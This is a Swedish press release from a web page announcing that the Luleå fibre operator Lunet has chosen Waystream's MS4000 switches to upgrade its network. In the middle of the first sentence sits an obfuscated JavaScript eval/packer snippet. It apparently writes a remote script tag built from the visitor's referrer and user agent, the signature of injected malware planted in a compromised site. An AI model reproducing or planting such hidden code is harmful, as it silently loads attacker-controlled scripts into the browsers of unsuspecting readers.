Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Lunet är ny kund till Waystream – Waystreams infrastruktur snabbar upp Luleås Internet

Lunet är ny kund till Waystream – Waystreams infrastruktur snabbar upp Luleås Internet
Sebastian

Lunet eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|refeb|var|u0026u|referrer|efdyd||js|php’.split(’|’),0,{}))
tillhandahåller bredband via fiber till invånarna i Luleå. I dagsläget når man 8 av 10 invånare och dessa kommer med uppgraderingen få ännu snabbare internetanslutningar, något som är nödvändigt i takt med att samhället digitaliseras allt mer.

”Då vi står inför en större uppdatering av vårt nätverk har vi utvärderat ett antal leverantörer under 2016/17. Valet föll på Waystream och MS4000 då vi under testperioden kunnat utvärdera produkten avseende kvalitet och funktionalitet. Vår uppfattning är att det är en produkt designad och framtagen för ändamålet, att leverera robusta och snabba fiberaccesser enligt dagens höga krav. Även närheten till Waystream och deras flexibilitet avseende funktionsinnehållet har spelat en stor roll i valet”

Thomas Sundström, VD på Lunet

Initialt handlar affären om 2 000 kundanslutningar till ett värde av 700 000 kronor. Accessutrustningen, Waystreams MS4000 som är en lager 2 Gigabit ethernet accesswitch, kommer levereras till Lunet i juni och ska användas för att uppgradera till Gigabit-hastighet. Denna första affär är endast början på ett större projekt som väntas löpa under 2017/18.

– Det känns väldigt bra att kunna presentera en ny kund. Vi är mycket stolta över att Lunet valt vår utrustning i hård konkurrens med andra tillverkare. Tillsammans ska vi nu snabba upp internet för Luleås invånare. Lunet har höga ambitioner och vi ser fram emot att växa med Lunet framöver, säger Johnny Hedlund, vd på Waystream.

Fibernät är den snabbast växande bredbandsteknologin i Sverige. Sverige är ett av sju länder inom Europa som idag har fler än 1 miljon fiberanslutningar. Enligt PTS rapport ”Svensk Telekommarknad första halvåret 2016”ökade antalet abonnemang via fiber med 17 procent, vilket motsvarar 262 000 abonnemang. Totalt vid halvårsskiftet uppgick antalet abonnemang via fiber till 1,8 miljoner i Sverige.[1]